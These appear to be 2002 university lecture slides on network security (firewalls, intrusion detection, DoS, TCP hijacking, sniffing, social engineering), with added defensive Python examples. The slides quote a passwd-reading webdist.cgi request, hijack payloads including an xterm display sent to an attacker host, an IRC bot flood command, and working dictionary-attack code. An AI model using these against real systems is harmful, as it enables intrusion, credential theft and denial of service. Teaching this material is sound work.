
Network Security

Justin Weisz
jweisz@andrew.cmu.edu

15-441 Networks Fall 2002

A Brief History of the World

15-441 Networks

Overview

- What is security?
- Why do we need security?
- Who is vulnerable?
- Common security attacks and countermeasures
  - Firewalls
  - Intrusion Detection Systems
  - Denial of Service Attacks
  - TCP Attacks
  - Packet Sniffing
  - Social Problems

What is "Security"

Dictionary.com says:
1. Freedom from risk or danger; safety.
2. Freedom from doubt, anxiety, or fear; confidence.
3. Something that gives or assures safety, as:
   1. A group or department of private guards: Call building security if a visitor acts suspicious.
   2. Measures adopted by a government to prevent espionage, sabotage, or attack.
   3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
...etc.


Why do we need security?

- Protect vital information while still allowing access to those who need it
  - Trade secrets, medical records, etc.
- Provide authentication and access control for resources
  - Ex: AFS
- Guarantee availability of resources
  - Ex: 5 9's (99.999% reliability)

Who is vulnerable?

- Financial institutions and banks
- Internet service providers
- Pharmaceutical companies
- Government and defense agencies
- Contractors to various government agencies
- Multinational corporations
- ANYONE ON THE NETWORK

Common security attacks and their countermeasures

- Finding a way into the network
  - Firewalls
- Exploiting software bugs, buffer overflows
  - Intrusion Detection Systems
- Denial of Service
  - Ingress filtering, IDS
- TCP hijacking
  - IPSec
- Packet sniffing
  - Encryption (SSH, SSL, HTTPS)
- Social problems
  - Education

Firewalls

- Basic problem: many network applications and protocols have security problems that are fixed over time
  - Difficult for users to keep up with changes and keep host secure
- Solution:
  - Administrators limit access to end hosts by using a firewall
  - Firewall is kept up-to-date by administrators

Firewalls

- A firewall is like a castle with a drawbridge
  - Only one point of access into the network
  - This can be good or bad
- Can be hardware or software
  - Ex. Some routers come with firewall functionality
  - ipfw, ipchains, pf on Unix systems
  - Windows XP and Mac OS X have built in firewalls

Firewalls

[Diagram: Internet -> Firewall -> DMZ (web server, email server, web proxy, etc.) -> Firewall -> Intranet]

Firewalls

- Used to filter packets based on a combination of features
  - These are called packet filtering firewalls
    - There are other types too, but they will not be discussed
  - Ex. Drop packets with destination port of 23 (Telnet)
  - Can use any combination of IP/UDP/TCP header information
  - man ipfw on unix47 for much more detail
- But why don't we just turn Telnet off?

Firewalls

- Here is what a computer with a default Windows XP install looks like:

  135/tcp   open  loc-srv
  139/tcp   open  netbios-ssn
  445/tcp   open  microsoft-ds
  1025/tcp  open  NFS-or-IIS
  3389/tcp  open  ms-term-serv
  5000/tcp  open  UPnP

- Might need some of these services, or might not be able to control all the machines on the network

Firewalls

- What does a firewall rule look like?
  - Depends on the firewall used
- Example: ipfw
  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
- Other examples: WinXP and Mac OS X have built in and third party firewalls
  - Different graphical user interfaces
  - Varying amounts of complexity and power
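To make the packet-filtering idea on the last few slides concrete, here is a small first-match filter in the style of an ipfw rule list. This is an added example, not code from the lecture or from ipfw itself: the rule syntax, the dataclasses, and the addresses (documentation ranges standing in for cracker.evil.org and wolf.tambov.su) are all constructed here, and the default verdict of "deny" when no rule matches is an assumption chosen because it is the safe posture (ipfw's own default depends on how the kernel was built).

```python
"""Toy stateless packet filter modelled on ipfw-style rules (added example,
not the lecture's code).  Rules are checked in order; the first match decides,
and a packet matching no rule is denied (assumed default-deny posture)."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str                    # "tcp", "udp" or "icmp"
    src: str                      # source IP address
    dst: str                      # destination IP address
    dport: Optional[int] = None   # destination port (tcp/udp only)


@dataclass(frozen=True)
class Rule:
    action: str                   # "allow" or "deny"
    proto: str = "any"
    src: str = "any"              # single IP or CIDR prefix, e.g. "10.0.0.0/8"
    dst: str = "any"
    dport: Optional[int] = None   # None means "any port"

    def matches(self, pkt: Packet) -> bool:
        if self.proto != "any" and self.proto != pkt.proto:
            return False
        if self.src != "any" and ip_address(pkt.src) not in ip_network(self.src, strict=False):
            return False
        if self.dst != "any" and ip_address(pkt.dst) not in ip_network(self.dst, strict=False):
            return False
        if self.dport is not None and self.dport != pkt.dport:
            return False
        return True


def filter_packet(rules, pkt: Packet) -> str:
    """Return the action of the first matching rule, or "deny" if none match."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return "deny"


# Constructed rule set mirroring the slides: block telnet from one named host,
# allow HTTP to the DMZ web server, block all other inbound telnet.
RULESET = [
    Rule("deny", proto="tcp", src="203.0.113.5", dst="198.51.100.10", dport=23),
    Rule("allow", proto="tcp", dst="198.51.100.10", dport=80),
    Rule("deny", proto="tcp", dport=23),
]

SAMPLE = [  # constructed packets
    Packet("tcp", "203.0.113.5", "198.51.100.10", 23),   # named attacker -> telnet
    Packet("tcp", "192.0.2.7", "198.51.100.10", 23),     # anyone else -> telnet
    Packet("tcp", "192.0.2.7", "198.51.100.10", 80),     # web traffic
    Packet("udp", "192.0.2.7", "198.51.100.10", 53),     # no rule: default deny
]


def run_sample():
    return [filter_packet(RULESET, p) for p in SAMPLE]


if __name__ == "__main__":
    for p, verdict in zip(SAMPLE, run_sample()):
        print(f"{p.proto} {p.src} -> {p.dst}:{p.dport}: {verdict}")
```

Rule order matters: the host-specific deny has to sit above the general rules, exactly as it would in a real ipfw list, and the trailing default-deny is what makes "turn Telnet off" unnecessary for hosts you do not control.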

Intrusion Detection

- Used to monitor for "suspicious activity" on a network
  - Can protect against known software exploits, like buffer overflows
- Open Source IDS: Snort, www.snort.org

Intrusion Detection

- Uses "intrusion signatures"
  - Well known patterns of behavior
    - Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
- Example
  - IRIX vulnerability in webdist.cgi
  - Can make a rule to drop packets containing the line:
    "/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd"
- However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring
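The signature on the slide is a plain substring match, which is how a Snort content rule works. The detector below is an added example (not the lecture's or Snort's code) that runs such signatures over constructed HTTP request lines; the rule ids are made up. One detail the slide does not show: the detector URL-decodes the request before matching, so "%20" and a literal space hit the same signature and simple encoding tricks do not slip past it.

```python
"""Minimal signature-based detector in the style of a Snort content rule
(added example).  Payloads are URL-decoded before matching so that encoded
variants of the slide's webdist.cgi request still trigger the signature."""
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass(frozen=True)
class Signature:
    sid: int            # rule id (constructed for this example)
    msg: str
    content: str        # substring that must occur in the decoded payload
    nocase: bool = True


# Constructed rules; the first is the slide's webdist.cgi line with %20 decoded.
SIGNATURES = [
    Signature(1001, "IRIX webdist.cgi command execution attempt",
              "/cgi-bin/webdist.cgi?distloc=?;cat /etc/passwd"),
    Signature(1002, "webdist.cgi access", "/cgi-bin/webdist.cgi"),
]


def normalize(payload: bytes) -> str:
    """Decode the request the way the web server will: bytes -> text, %XX -> char."""
    return unquote(payload.decode("latin-1"))


def match(payload: bytes, sigs=SIGNATURES):
    """Return the sids of every signature whose content occurs in the payload."""
    text = normalize(payload)
    hits = []
    for s in sigs:
        hay, needle = (text.lower(), s.content.lower()) if s.nocase else (text, s.content)
        if needle in hay:
            hits.append(s.sid)
    return hits


# Constructed sample traffic: a benign request, the encoded attempt, a mixed-case variant.
SAMPLE = [
    b"GET /index.html HTTP/1.0\r\n",
    b"GET /cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd HTTP/1.0\r\n",
    b"GET /CGI-BIN/WebDist.cgi?distloc=?;cat%2f/etc/passwd HTTP/1.0\r\n",
]


def scan(packets=SAMPLE):
    return [match(p) for p in packets]


if __name__ == "__main__":
    for pkt, hits in zip(SAMPLE, scan()):
        print(pkt.strip().decode(), "->", hits or "clean")
```

The third sample request decodes "%2f" to "/" rather than a space, so only the broader "webdist.cgi access" rule fires on it; that is the point of keeping a second, looser signature alongside the exact one.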

Minor Detour...

- Say we got the /etc/passwd file from the IRIX server
- What can we do with it?

Dictionary Attack

- We can run a dictionary attack on the passwords
  - The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash)
  - Can take a dictionary of words, crypt() them all, and compare with the hashed passwords
- This is why your passwords should be meaningless random junk!
  - For example, "sdfo839f" is a good password
    - That is not my andrew password
    - Please don't try it either
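The password audit the slide describes, as an added example that is not part of the lecture: hash every word of a wordlist and compare against stored hashes. crypt(3) is replaced here by a salted SHA-256 from hashlib, because Python's crypt module is deprecated; the salted one-way-hash-then-compare mechanics are the same. The accounts, salts and wordlist are constructed. Running it on your own password file is how you find the "letmein" accounts before someone else does.

```python
"""Offline dictionary audit of stored password hashes (added example, not the
lecture's code).  hash_password stands in for crypt(3): a salted one-way hash
whose salt is stored alongside the digest."""
import hashlib


def hash_password(password: str, salt: str) -> str:
    """One-way hash standing in for crypt(3); salt is stored with the hash."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return f"{salt}${digest}"


def dictionary_attack(shadow: dict, wordlist) -> dict:
    """Return {user: recovered_password} for every stored hash that matches a word."""
    # Group accounts by salt so each word is hashed once per salt, not once per user.
    by_salt = {}
    for user, stored in shadow.items():
        salt = stored.split("$", 1)[0]
        by_salt.setdefault(salt, {})[stored] = user
    found = {}
    for word in wordlist:
        for salt, table in by_salt.items():
            candidate = hash_password(word, salt)
            if candidate in table:
                found[table[candidate]] = word
    return found


# Constructed /etc/passwd-style data; salts and passwords are made up.
WORDLIST = ["password", "letmein", "dragon", "123456", "andrew"]
SHADOW = {
    "alice": hash_password("letmein", "x7"),
    "bob":   hash_password("sdfo839f", "q2"),   # the slide's "meaningless random junk"
    "carol": hash_password("dragon", "x7"),
}


def audit(shadow=SHADOW, wordlist=WORDLIST):
    return dictionary_attack(shadow, wordlist)


if __name__ == "__main__":
    weak = audit()
    for user in SHADOW:
        print(user, "WEAK" if user in weak else "not in wordlist")
```

The salt does not stop a dictionary attack on any one account; it only prevents one hashed wordlist from being reused across every account and every system, which is why the grouping by salt above still has to hash each word once per distinct salt.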

Denial of Service

- Purpose: Make a network service unusable, usually by overloading the server or network
- Many different kinds of DoS attacks
  - SYN flooding
  - SMURF
  - Distributed attacks
  - Mini Case Study: Code-Red

Denial of Service

- SYN flooding attack
  - Send SYN packets with bogus source address
    - Why?
  - Server responds with SYN ACK and keeps state about TCP half-open connection
    - Eventually, server memory is exhausted with this state
- Solution: use "SYN cookies"
  - In response to a SYN, create a special "cookie" for the connection, and forget everything else
  - Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
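How a SYN cookie lets the server "forget everything" and still finish the handshake, as an added example that is not from the lecture. It follows the classic layout (a few bits of time counter, a few bits encoding the client's MSS, and a keyed hash of the connection 4-tuple in the rest of the 32-bit ISN), but the secret key, the MSS table and the addresses are constructed here. A forged ACK from a spoofed source fails the hash, and a stale cookie fails the freshness check, so neither costs the server any stored state.

```python
"""SYN cookie construction and validation (added example, not the lecture's
code).  ISN layout: bits 31..27 = time counter mod 32, bits 26..24 = index
into an MSS table, bits 23..0 = keyed hash of the 4-tuple and the counter."""
import hashlib
import hmac

SECRET = b"constructed-server-secret"          # rotated periodically on a real host
MSS_TABLE = [536, 1220, 1440, 1460]            # MSS values encodable in 3 bits


def _mac24(src, dst, sport, dport, counter):
    """24-bit keyed hash binding the cookie to one connection and one time slot."""
    msg = f"{src}|{dst}|{sport}|{dport}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(src, dst, sport, dport, client_mss, counter):
    """Build the ISN the server sends in its SYN-ACK; no per-connection state is kept."""
    fits = [i for i, m in enumerate(MSS_TABLE) if m <= client_mss]
    mss_idx = fits[-1] if fits else 0
    t = counter & 0x1F
    return (t << 27) | (mss_idx << 24) | _mac24(src, dst, sport, dport, t)


def check_cookie(src, dst, sport, dport, ack, counter, max_age=4):
    """On the final ACK, recover the MSS from ack-1 if the cookie is genuine
    and fresh; return None (drop, no state consumed) otherwise."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    # Freshness: the counter in the cookie must be recent (modulo 32 wrap-around).
    if ((counter & 0x1F) - t) % 32 > max_age:
        return None
    # Authenticity: the hash must match for this exact 4-tuple and time slot.
    if (cookie & 0xFFFFFF) != _mac24(src, dst, sport, dport, t):
        return None
    if mss_idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[mss_idx]


def demo():
    """Constructed exchange: client SYN, server SYN-ACK carrying the cookie, client ACK."""
    src, dst, sport, dport = "192.0.2.7", "198.51.100.10", 40000, 80
    isn = make_cookie(src, dst, sport, dport, client_mss=1460, counter=17)
    good = check_cookie(src, dst, sport, dport, isn + 1, counter=18)
    # ACK arriving with a different source: the hash no longer matches.
    forged = check_cookie("203.0.113.9", dst, sport, dport, isn + 1, counter=18)
    # Same cookie replayed much later: fails the freshness check.
    stale = check_cookie(src, dst, sport, dport, isn + 1, counter=27)
    return good, forged, stale


if __name__ == "__main__":
    print(demo())   # (1460, None, None)
```

The cost of this design is visible in the MSS table: only a handful of option values survive the round trip, and any TCP option that does not fit in the cookie is lost, which is why real stacks only switch cookies on once the SYN backlog overflows.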

Denial of Service

[Slide contains only a figure]

Denial of Service

- SMURF
  - Source IP address of a broadcast ping is forged
  - Large number of machines respond back to victim, overloading it

Denial of Service

[Diagram: the Perpetrator sends an ICMP echo with the spoofed source address of the Victim to an IP broadcast address across the Internet; every host on that network sends an ICMP echo reply to the Victim]

Denial of Service

- Distributed Denial of Service
  - Same techniques as regular DoS, but on a much larger scale
  - Example: Sub7Server Trojan and IRC bots
    - Infect a large number of machines with a "zombie" program
    - Zombie program logs into an IRC channel and awaits commands
    - Example:
      Bot command: !p4 207.71.92.193
      Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
      Sends 10,000 64k packets to the host (655MB!)
    - Read more at: http://grc.com/dos/grcdos.htm

Denial of Service

- Mini Case Study: CodeRed
  - July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours
  - Used a recently known buffer exploit in Microsoft IIS
  - Damages estimated in excess of $2.6 billion

Denial of Service

- Why is this under the Denial of Service category?
  - CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month!
  - Spent the rest of its time infecting other hosts

Denial of Service

- How can we protect ourselves?
  - Ingress filtering
    - If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it
    - RFC 2267 has more information about this
  - Stay on top of CERT advisories and the latest security patches
    - A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed!
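The ingress-filtering rule from RFC 2267 as a router would apply it, written as an added example that is not from the lecture: a packet is forwarded only if its source address is one that could legitimately arrive on that interface. It goes one step beyond the slide and also drops ICMP echo requests aimed at a directed-broadcast address, the amplifier that the earlier SMURF slides rely on; that extra check is my addition. The interfaces, prefixes and sample packets are all constructed.

```python
"""Ingress filter in the spirit of RFC 2267 plus a directed-broadcast check
(added example, not the lecture's code).  A constructed two-port router:
eth0 faces a customer network, eth1 faces the upstream Internet."""
from ipaddress import ip_address, ip_network

# Source prefixes that may legitimately arrive on each interface.
INGRESS_TABLE = {
    "eth0": [ip_network("192.0.2.0/24")],       # customer network behind eth0
    "eth1": [ip_network("0.0.0.0/0")],          # upstream: anything not ours
}
LOCAL_PREFIXES = [ip_network("192.0.2.0/24")]  # our own space, for spoof/broadcast checks


def source_permitted(iface: str, src: str) -> bool:
    """RFC 2267 check: the source must be reachable via the arrival interface."""
    addr = ip_address(src)
    if iface == "eth1":
        # Upstream-facing: a packet claiming one of our own prefixes is spoofed.
        return not any(addr in p for p in LOCAL_PREFIXES)
    return any(addr in p for p in INGRESS_TABLE.get(iface, []))


def is_directed_broadcast(dst: str) -> bool:
    """True if dst is the broadcast address of one of our prefixes."""
    addr = ip_address(dst)
    return any(addr == p.broadcast_address for p in LOCAL_PREFIXES)


def decide(iface, src, dst, proto, icmp_type=None) -> str:
    """Return "forward" or "drop:<reason>" for one packet."""
    if not source_permitted(iface, src):
        return "drop:spoofed-source"
    # ICMP type 8 = echo request; refusing it to a broadcast address removes the amplifier.
    if proto == "icmp" and icmp_type == 8 and is_directed_broadcast(dst):
        return "drop:directed-broadcast-echo"
    return "forward"


SAMPLE = [  # constructed packets: (iface, src, dst, proto, icmp_type)
    ("eth0", "192.0.2.10", "198.51.100.1", "tcp", None),    # legitimate customer traffic
    ("eth0", "203.0.113.5", "198.51.100.1", "tcp", None),   # spoofed source on customer port
    ("eth1", "192.0.2.10", "198.51.100.1", "tcp", None),    # our own prefix arriving from upstream
    ("eth1", "203.0.113.5", "192.0.2.255", "icmp", 8),      # SMURF: echo to our broadcast address
    ("eth1", "203.0.113.5", "192.0.2.20", "icmp", 8),       # ordinary ping to one host
]


def run_sample():
    return [decide(*p) for p in SAMPLE]


if __name__ == "__main__":
    for p, v in zip(SAMPLE, run_sample()):
        print(p[0], p[1], "->", p[2], v)
```

Note what the filter cannot do: it only rejects sources that are impossible on a given port, so a customer spoofing another address inside its own /24 still gets through. Ingress filtering limits how far a spoofed packet can travel, not whether it exists.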

TCP Attacks

- Recall how IP works...
  - End hosts create IP packets and routers process them purely based on destination address alone
- Problem: End hosts may lie about other fields which do not affect delivery
  - Source address: host may trick destination into believing that the packet is from a trusted source
    - Especially applications which use IP addresses as a simple authentication method
    - Solution: use better authentication methods

TCP Attacks

- TCP connections have associated state
  - Starting sequence numbers, port numbers
- Problem: what if an attacker learns these values?
  - Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)
  - Sequence numbers are sometimes chosen in very predictable ways

TCP Attacks

- If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
  - Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source
  - Ex. Instead of downloading and running new program, you download a virus and execute it
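The "chosen in very predictable ways" remark is worth measuring rather than asserting. The added example below (not the lecture's code) implements two ISN generators, a legacy counter that bumps by a constant per connection and a keyed-hash generator in the spirit of RFC 1948, and scores each by how often an observer who has seen the ISNs of a few earlier connections guesses the next one exactly. That is the kind of check an auditor runs against their own hosts before trusting address-based authentication; the secret, addresses and timing are constructed.

```python
"""Scoring ISN predictability (added example, not the lecture's code).
CounterISN models the old constant-increment scheme; HashedISN models
RFC 1948 style ISNs (clock plus a keyed hash of the 4-tuple)."""
import hashlib
import hmac

SECRET = b"constructed-host-secret"   # per-host secret, unknown to the observer


class CounterISN:
    """Legacy style: one global counter, bumped by a fixed step per connection."""
    def __init__(self, start=0x1000, step=64000):
        self.value, self.step = start, step

    def next_isn(self, src, dst, sport, dport, clock):
        self.value = (self.value + self.step) & 0xFFFFFFFF
        return self.value


class HashedISN:
    """RFC 1948 style: clock plus a keyed per-4-tuple offset.  Sequence numbers
    for one connection still advance with the clock, but the offset for any
    other connection is unknowable without the secret."""
    def next_isn(self, src, dst, sport, dport, clock):
        msg = f"{src}|{dst}|{sport}|{dport}".encode()
        offset = int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4], "big")
        return (clock + offset) & 0xFFFFFFFF


def guess_next(observed):
    """Observer's model: ISNs advance by a constant delta between connections."""
    delta = (observed[-1] - observed[-2]) & 0xFFFFFFFF
    return (observed[-1] + delta) & 0xFFFFFFFF


def prediction_rate(gen, trials=50):
    """Fraction of fresh connections whose ISN the constant-delta guess gets exactly right."""
    hits, clock, observed = 0, 1_000_000, []
    for i in range(trials + 2):
        # Each trial is a new connection from a different client port.
        isn = gen.next_isn("192.0.2.7", "198.51.100.10", 40000 + i, 80, clock)
        clock += 250_000                      # ~250 ms of 4-microsecond ticks between connections
        if len(observed) >= 2:
            hits += guess_next(observed) == isn
        observed.append(isn)
    return hits / trials


def compare():
    """Return (counter_rate, hashed_rate)."""
    return prediction_rate(CounterISN()), prediction_rate(HashedISN())


if __name__ == "__main__":
    c, h = compare()
    print(f"constant-increment ISNs guessed: {c:.0%}, hashed ISNs guessed: {h:.0%}")
```

A real audit would use a richer model than constant delta (the lcamtuf link at the end of the deck shows 3-D phase-space plots of exactly this), but even this crude observer gets the legacy generator right every time, which is all the off-path attacker on the next slides needs.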

TCP Attacks

- Say hello to Alice, Bob and Mr. Big Ears

TCP Attacks

- Alice and Bob have an established TCP connection

TCP Attacks

- Mr. Big Ears lies on the path between Alice and Bob on the network
  - He can intercept all of their packets

TCP Attacks

- First, Mr. Big Ears must drop all of Alice's packets since they must not be delivered to Bob (why?)

[Diagram: Alice's packets are diverted into "The Void"]

TCP Attacks

- Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)

[Diagram: packet labelled "ISN, SRC=Alice" delivered to Bob]

TCP Attacks

- What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
  - Can just DoS Alice instead of dropping her packets
  - Can just send guesses of what the ISN is until it is accepted
- How do you know when the ISN is accepted?
  - Mitnick: payload is "add self to .rhosts"
  - Or, "xterm -display MrBigEars:0"

TCP Attacks

- Why are these types of TCP attacks so dangerous?

[Diagram: Web server, Trusting web client, Malicious user]

TCP Attacks

- How do we prevent this?
- IPSec
  - Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
  - Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is

Five Minute Break

- For your enjoyment, here is something completely unrelated to this lecture:

[Slide contains only an image]

Packet Sniffing

- Recall how Ethernet works...
  - When someone wants to send a packet to someone else...
  - They put the bits on the wire with the destination MAC address...
  - And remember that other hosts are listening on the wire to detect for collisions...
  - It couldn't get any easier to figure out what data is being transmitted over the network!

Packet Sniffing

- This works for wireless too!
  - In fact, it works for any broadcast-based medium

Packet Sniffing

- What kinds of data can we get?
  - Asked another way, what kind of information would be most useful to a malicious user?
  - Answer: Anything in plain text
    - Passwords are the most popular

Packet Sniffing

- How can we protect ourselves?
- SSH, not Telnet
  - Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
  - Now that I have told you this, please do not exploit this information
  - Packet sniffing is, by the way, prohibited by Computing Services
- HTTP over SSL
  - Especially when making purchases with credit cards!
- SFTP, not FTP
  - Unless you really don't care about the password or data
  - Can also use KerbFTP (download from MyAndrew)
- IPSec
  - Provides network-layer confidentiality

Social Problems

- People can be just as dangerous as unprotected computer systems
  - People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information
  - Most humans will break down once they are at the "harmed" stage, unless they have been specially trained
    - Think government here...

Social Problems

- Fun Example 1:
  - "Hi, I'm your AT&T rep, I'm stuck on a pole. I need you to punch a bunch of buttons for me"

Social Problems

- Fun Example 2:
  - Someone calls you in the middle of the night
    - "Have you been calling Egypt for the last six hours?"
    - "No"
    - "Well, we have a call that's actually active right now, it's on your calling card and it's to Egypt and as a matter of fact, you've got about $2000 worth of charges on your card and ... read off your AT&T card number and PIN and then I'll get rid of the charge for you"

Social Problems

- Fun Example 3:
  - Who saw Office Space?
  - In the movie, the three disgruntled employees installed a money-stealing worm onto the company's systems
  - They did this from inside the company, where they had full access to the company's systems
    - What security techniques can we use to prevent this type of access?

Social Problems

- There aren't always solutions to all of these problems
  - Humans will continue to be tricked into giving out information they shouldn't
  - Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it
- So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information
  - But, this solution is still not perfect

Conclusions

- The Internet works only because we implicitly trust one another
  - It is very easy to exploit this trust
- The same holds true for software
  - It is important to stay on top of the latest CERT security advisories to know how to patch any security holes

Security related URLs

- http://www.robertgraham.com/pubs/network-intrusion-detection.html
- http://online.securityfocus.com/infocus/1527
- http://www.snort.org/
- http://www.cert.org/
- http://www.nmap.org/
- http://grc.com/dos/grcdos.htm
- http://lcamtuf.coredump.cx/newtcp/
